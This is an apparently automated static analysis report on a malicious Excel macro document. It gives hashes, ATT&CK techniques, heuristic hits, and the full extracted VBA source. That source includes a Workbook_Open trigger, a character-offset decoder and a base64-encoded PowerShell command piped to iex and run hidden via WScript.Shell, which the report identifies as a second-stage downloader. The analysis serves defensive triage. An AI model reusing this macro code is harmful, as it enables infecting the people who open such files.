Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ee001d9a6d5525c1…

MALICIOUS

Office (OOXML)

21.8 KB Created: 2021-08-18 15:22:44 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-09-13
MD5: 872ba8206b9ecedb116ce7d04b18c3af SHA-1: 96f5907c97ef71f961da9471d00da9b35d8be15f SHA-256: ee001d9a6d5525c14e67b80facd7aebcad543569f25aec800ee90145097a7632
232 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The file is an OOXML document containing a Workbook_Open VBA macro. This macro utilizes CreateObject and WScript.Shell to execute obfuscated code that includes a URL, strongly indicating an attempt to download and execute a second-stage payload. The obfuscated nature of the script and the presence of a URL suggest a downloader or droppper functionality.

Heuristics 8

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    lhxfpvbqqlahybxkwfjeiijwqsyvlhhkktvol = "WSCript.shell"
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
    lhxfpvbqqlahybxkwfjeiijwqsyvlhhkktvol = "WSCript.shell"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set vhzby = CreateObject(lhxfpvbqqlahybxkwfjeiijwqsyvlhhkktvol)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub workbook_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://brightcarbon.com/ Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 9839 bytes
SHA-256: 1953a5aeb3eeadb3e8184c404200d29e4c3fa8fb4b418c6221a4df4f89121723
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 10 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub VBA_Presentation()

  Dim PAplication As PowerPoint.Application
  Dim PPT As PowerPoint.Presentation
  Dim PPTSlide As PowerPoint.Slide
  Dim PPTShapes As PowerPoint.Shape
  Dim PPTCharts As Excel.ChartObject

  Set PAplication = New PowerPoint.Application

  PAplication.Visible = msoCTrue
  PAplication.WindowState = ppWindowMaximized

End Sub
Private Sub workbook_open()
uml.sa
sda = gfdfsgfdf

End Sub
Sub InsertTextAtEndOfDocument()
 ActiveDocument.Content.InsertAfter Text:=" The end."
End Sub

Attribute VB_Name = "Hoja1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "uml"
' Purpose : Displays a dialog box with a Hello World text message.
' Author : Jamie Garroch
' Date : 06MAY2019
' Website : https://brightcarbon.com/
'----------------------------------------------------------------------------------
 
Sub HelloWorld()
 MsgBox "Hello World!", vbInformation + vbOKOnly, "This is my first VBA Macro"
End Sub
Sub sa()
nqg = kui(220) & kui(198) & kui(221) & kui(153) & kui(168) & kui(188) & kui(153) & kui(201) & kui(232) & kui(215) & kui(240) & kui(215) & kui(190) & kui(203) & kui(204) & kui(215) & kui(193) & kui(222) & kui(215) & kui(197) & kui(229) & kui(153) & kui(166) & kui(190) & kui(153)
nqg = nqg & "WwBTAHkAUwB0AEUATQAuAHQAZQBYAHQALgBFAG4AQwBPAEQASQBuAEcAXQA6ADoAdQBOAEkAQwBvAEQARQAuAGcARQB0AFMAVAByAGkATgBHACgAWwBTAHkAcwB0AGUATQAuAGMAbwBuAHYAZQByAHQAXQA6ADoARgBSAE8ATQBCAGEAcwBlADYANABzAFQAUgBJAE4ARwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwB"
nqg = nqg & "BAEcAWQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEcARQBBAGUAQQBCAGoAQQBHADQAQQBiAGcAQgAzAEEASABZAEEAYwBBAEIAMwBBAEgAVQBBAGUAZwBCAGgAQQBIAG8AQQBjAHcAQgBsAEEARwAwAEEAWgBRAEIAbABBAEgASQBBAGEAUQBCAGwAQQBHAGcAQQBiAGcAQgBzAEEARwBrAEEAWQBnAEIANABBAEcARQBBAFoAQQBCAHMAQQBIAE0AQQBJAEEAQQBvAEEAQwBBAEEASgBBAEIAMABBAEcARQBBAGIAUQBCADUAQQBIAFEAQQBlAEEAQgB0AEEARwBVAEEAWgB3AEIAdgBBAEcAMABBAGUAQQBBAGcAQQBDAHcAQQBJAEEAQQBrAEEARwAwAEEAYwB3AEIAaQBBAEcAOABBAGMAUQBCAHgAQQBHADgAQQBkAFEAQgBwAEEARwBjAEEAYwBnAEIANABBAEgATQBBAGEAdwBCAHkAQQBHAFUAQQBJAEEAQQBwAEEAQQAwAEEAQwBnAEIANwBBAEMAQQBBAGEAUQBCAHQAQQBGAE"
nqg = nqg & "EAQQBUAHcAQgBTAEEASABRAEEATABRAEIATgBBAEcAOABBAFIAQQBCADEAQQBFAHcAQQBaAFEAQQBnAEEARQBJAEEAYQBRAEIAVQBBAEgATQBBAFYAQQBCAFMAQQBFAEUAQQBiAGcAQgBUAEEARwBZAEEAWgBRAEIAeQBBAEQAcwBBAEQAUQBBAEsAQQBIAE0AQQBkAEEAQgBoAEEASABJAEEAZABBAEEAdABBAEUASQBBAGEAUQBCADAAQQBGAE0AQQBWAEEAQgBTAEEARQBFAEEAYgBnAEIAVABBAEUAWQBBAFIAUQBCAHkAQQBDAEEAQQBMAFEAQgBUAEEARQA4AEEAVgBRAEIAeQBBAEUATQBBAFIAUQBBAGcAQQBDAFEAQQBkAEEAQgBoAEEARwAwAEEAZQBRAEIAMABBAEgAZwBBAGIAUQBCAGwAQQBHAGMAQQBiAHcAQgB0AEEASABnAEEASQBBAEEAdABBAEUAUQBBAFoAUQBCAHoAQQBGAFEAQQBTAFEAQgB1AEEARwBFAEEAZABBAEIASgBBAEUAOABBAFQAZwBBAGcAQQBDAFEAQQBiAFEAQgB6AEEARwBJAEEAY"
nqg = nqg & "gB3AEIAeABBAEgARQBBAGIAdwBCADEAQQBHAGsAQQBaAHcAQgB5AEEASABnAEEAYwB3AEIAcgBBAEgASQBBAFoAUQBBADcAQQBDAEEAQQBKAGcAQQBnAEEAQwBRAEEAYgBRAEIAegBBAEcASQBBAGIAdwBCAHgAQQBIAEUAQQBiAHcAQgAxAEEARwBrAEEAWgB3AEIAeQBBAEgAZwBBAGMAdwBCAHIAQQBIAEkAQQBaAFEAQQA3AEEAQwBBAEEAZgBRAEIAMABBAEgASQBBAGUAUQBCADcAQQBDAFEAQQBiAFEAQgBvAEEARwBNAEEAZQBRAEIAcQBBAEgARQBBAFoAQQBCAG4AQQBHAFkAQQBiAFEAQgB3AEEASABjAEEAYQBBAEIAMwBBAEcAZwBBAGUAQQBBADkAQQBDAFEAQQBaAFEAQgB1AEEARgBZAEEATwBnAEIAVQBBAEcAVQBBAGIAUQBCAFEAQQBDAHMAQQBKAHcAQgBjAEEASABVAEEAWQBnAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBPAHcAQQBOAEEAQQBvAEEAWQBRAEIANABBAEcATQBBAGIAZwBC"
nqg = nqg & "AHUAQQBIAGMAQQBkAGcAQgB3AEEASABjAEEAZABRAEIANgBBAEcARQBBAGUAZwBCAHoAQQBHAFUAQQBiAFEAQgBsAEEARwBVAEEAYwBnAEIAcABBAEcAVQBBAGEAQQBCAHUAQQBHAHcAQQBhAFEAQgBpAEEASABnAEEAWQBRAEIAawBBAEcAdwBBAGMAdwBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBaAEEAQgB1AEEAQwA0AEEAWgBBAEIAcABBAEgATQBBAFkAdwBCAHYAQQBIAEkAQQBaAEEAQgBoAEEASABBAEEAYwBBAEEAdQBBAEcATQBBAGIAdwBCAHQAQQBDADgAQQBZAFEAQgAwAEEASABRAEEAWQBRAEIAagBBAEcAZwBBAGIAUQBCAGwAQQBHADQAQQBkAEEAQgB6AEEAQwA4AEEATwBBAEEAMwBBAEQAVQBBAE4AQQBBAHcAQQBEAEUAQQBNAHcAQQAwAEEARABJAEEATQBRAEEAMwBBAEQAVQBBAE0AdwBBAHcAQQBEAEUAQQBOAGcAQQAxAEE"
nqg = nqg & "ARABVAEEATAB3AEEANABBAEQAYwBBAE4AdwBBADEAQQBEAGMAQQBNAHcAQQB4AEEARABBAEEATgBnAEEANQBBAEQAQQBBAE8AUQBBAHgAQQBEAGsAQQBOAGcAQQB6AEEARABnAEEATwBBAEEAdgBBAEQAawBBAFUAUQBCAEgAQQBIAEUAQQBVAHcAQQAyAEEARgBZAEEAWQB3AEIATwBBAEUAOABBAFoAdwBCAFEAQQBHAHMAQQBlAEEAQgBUAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDAFEAQQBiAFEAQgBvAEEARwBNAEEAZQBRAEIAcQBBAEgARQBBAFoAQQBCAG4AQQBHAFkAQQBiAFEAQgB3AEEASABjAEEAYQBBAEIAMwBBAEcAZwBBAGUAQQBBADcAQQBBADAAQQBDAGcAQgBoAEEASABnAEEAWQB3AEIAdQBBAEcANABBAGQAdwBCADIAQQBIAEEAQQBkAHcAQgAxAEEASABvAEEAWQBRAEIANgBBAEgATQBBAFoAUQBCAHQAQQBHAFUAQQBaAFEAQgB5AEEARwBrAEEAWgBRAEIAbwBBAEcANA"
nqg = nqg & "BBAGIAQQBCAHAAQQBHAEkAQQBlAEEAQgBoAEEARwBRAEEAYgBBAEIAegBBAEMAQQBBAEoAdwBCAG8AQQBIAFEAQQBkAEEAQgB3AEEASABNAEEATwBnAEEAdgBBAEMAOABBAFkAdwBCAGsAQQBHADQAQQBMAGcAQgBrAEEARwBrAEEAYwB3AEIAagBBAEcAOABBAGMAZwBCAGsAQQBHAEUAQQBjAEEAQgB3AEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAEwAdwBCAGgAQQBIAFEAQQBkAEEAQgBoAEEARwBNAEEAYQBBAEIAdABBAEcAVQBBAGIAZwBCADAAQQBIAE0AQQBMAHcAQQA0AEEARABjAEEATgBRAEEAMABBAEQAQQBBAE0AUQBBAHoAQQBEAFEAQQBNAGcAQQB4AEEARABjAEEATgBRAEEAegBBAEQAQQBBAE0AUQBBADIAQQBEAFUAQQBOAFEAQQB2AEEARABnAEEATgB3AEEAMwBBAEQAVQBBAE4AdwBBAHoAQQBEAEUAQQBNAEEAQQAyAEEARABrAEEATQBBAEEANQBBAEQARQBBAE8AUQBBADIAQQBEAE0AQQBPA"
nqg = nqg & "EEAQQA0AEEAQwA4AEEATwBRAEIAUgBBAEUAYwBBAGMAUQBCAFQAQQBEAFkAQQBWAGcAQgBqAEEARQA0AEEAVAB3AEIAbgBBAEYAQQBBAGEAdwBCADQAQQBGAE0AQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEMAQQBBAEoAQQBCAHQAQQBHAGcAQQBZAHcAQgA1AEEARwBvAEEAYwBRAEIAawBBAEcAYwBBAFoAZwBCAHQAQQBIAEEAQQBkAHcAQgBvAEEASABjAEEAYQBBAEIANABBAEQAcwBBAEQAUQBBAEsAQQBHAEUAQQBlAEEAQgBqAEEARwA0AEEAYgBnAEIAMwBBAEgAWQBBAGMAQQBCADMAQQBIAFUAQQBlAGcAQgBoAEEASABvAEEAYwB3AEIAbABBAEcAMABBAFoAUQBCAGwAQQBIAEkAQQBhAFEAQgBsAEEARwBnAEEAYgBnAEIAcwBBAEcAawBBAFkAZwBCADQAQQBHAEUAQQBaAEEAQgBzAEEASABNAEEASQBBAEEAbgBBAEcAZwBBAGQAQQBCADAAQQBIAEEAQQBjAHcAQQA2AEEAQwA4AEEATAB3AEIA"
nqg = nqg & "agBBAEcAUQBBAGIAZwBBAHUAQQBHAFEAQQBhAFEAQgB6AEEARwBNAEEAYgB3AEIAeQBBAEcAUQBBAFkAUQBCAHcAQQBIAEEAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAdgBBAEcARQBBAGQAQQBCADAAQQBHAEUAQQBZAHcAQgBvAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAGMAdwBBAHYAQQBEAGcAQQBOAHcAQQAxAEEARABRAEEATQBBAEEAeABBAEQATQBBAE4AQQBBAHkAQQBEAEUAQQBOAHcAQQAxAEEARABNAEEATQBBAEEAeABBAEQAWQBBAE4AUQBBADEAQQBDADgAQQBPAEEAQQAzAEEARABjAEEATgBRAEEAMwBBAEQATQBBAE0AUQBBAHcAQQBEAFkAQQBPAFEAQQB3AEEARABrAEEATQBRAEEANQBBAEQAWQBBAE0AdwBBADQAQQBEAGcAQQBMAHcAQQA1AEEARgBFAEEAUgB3AEIAeABBAEYATQBBAE4AZwBCAFcAQQBHAE0AQQBUAGcAQgBQAEEARwBjAEEAVQBBAEIAcgBBAEgAZwBBAFUAdwBBAHUAQQB"
nqg = nqg & "HAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAawBBAEcAMABBAGEAQQBCAGoAQQBIAGsAQQBhAGcAQgB4AEEARwBRAEEAWgB3AEIAbQBBAEcAMABBAGMAQQBCADMAQQBHAGcAQQBkAHcAQgBvAEEASABnAEEATwB3AEEATgBBAEEAbwBBAGYAUQBCAGoAQQBHAEUAQQBkAEEAQgBqAEEARwBnAEEAZQB3AEIAOQBBAEEAPQA9ACIAKQApAHwAaQBlAFgA"


On Error Resume Next
prezigsc = nqg
prntkeeanq (prezigsc)
End Sub
Sub dsffsdfds()

  Dim PAplication As PowerPoint.Application
  Dim PPT As PowerPoint.Presentation
  Dim PPTSlide As PowerPoint.Slide
  Dim PPTShapes As PowerPoint.Shape
  Dim PPTCharts As Excel.ChartObject

  Set PAplication = New PowerPoint.Application

  PAplication.Visible = msoCTrue
  PAplication.WindowState = ppWindowMaximized

  Set PPT = PAplication.Presentations.Add

  For Each PPTCharts In ActiveSheet.ChartObjects

  Next PPTCharts

End Sub

Function prntkeeanq(ekrpxyknmkrdnzqyrkywprixgukrt As String)
yqefljepodsljyziktokcr = 11 - 11
hgfh = "bfgghd jhfg gdfg"
lhxfpvbqqlahybxkwfjeiijwqsyvlhhkktvol = "WSCript.shell"
Set vhzby = CreateObject(lhxfpvbqqlahybxkwfjeiijwqsyvlhhkktvol)
doatabrnwbndkkvbnbuido = vhzby.Run(ekrpxyknmkrdnzqyrkywprixgukrt, yqefljepodsljyziktokcr)
End Function

Sub InsertingSlide()
'
' Macro recorded #date# by Russell Proctor
'

   ActiveWindow.View.GotoSlide Index:=ActivePresentation.Slides.Add(Index:=2, Layout:=ppLayoutText).SlideIndex
   ActiveWindow.Selection.SlideRange.Shapes("Rectangle 2").Select
   ActiveWindow.Selection.ShapeRange.TextFrame.TextRange.Select
   ActiveWindow.Selection.ShapeRange.TextFrame.TextRange.Characters(Start:=1, Length:=0).Select
   With ActiveWindow.Selection.TextRange
      .Text = "Another Slide"
      With .Font
         .Name = "Arial"
         .Size = 44
         .Bold = msoFalse
         .Italic = msoFalse
         .Underline = msoFalse
         .Shadow = msoFalse
         .Emboss = msoFalse
         .BaselineOffset = 0
         .AutorotateNumbers = msoFalse
         .Color.SchemeColor = ppTitle
      End With
   End With
End Sub
Function kui(fscv As Variant)
sdfgf = "ghtr  bfgdfj 5t64"
kui = Chr(fscv - 121)
bvcxb = "gfdsg bvxcvv gsdg et vbdfb xbcvx"
End Function
Sub dsadsa()
   ActiveWindow.View.GotoSlide Index:=ActivePresentation.Slides.Add(Index:=2, Layout:=ppLayoutText).SlideIndex
   ActiveWindow.Selection.SlideRange.Shapes("Rectangle 2").Select
   ActiveWindow.Selection.SlideRange.Shapes("Rectangle 2").TextFrame.TextRange.Text = "Another Slide"
End Sub
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 31232 bytes
SHA-256: ac6b85e940ac7f0111521a4103862302e6cd478eb99d3797dccd1a49a9b2df97
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 10 long base64-like blob(s).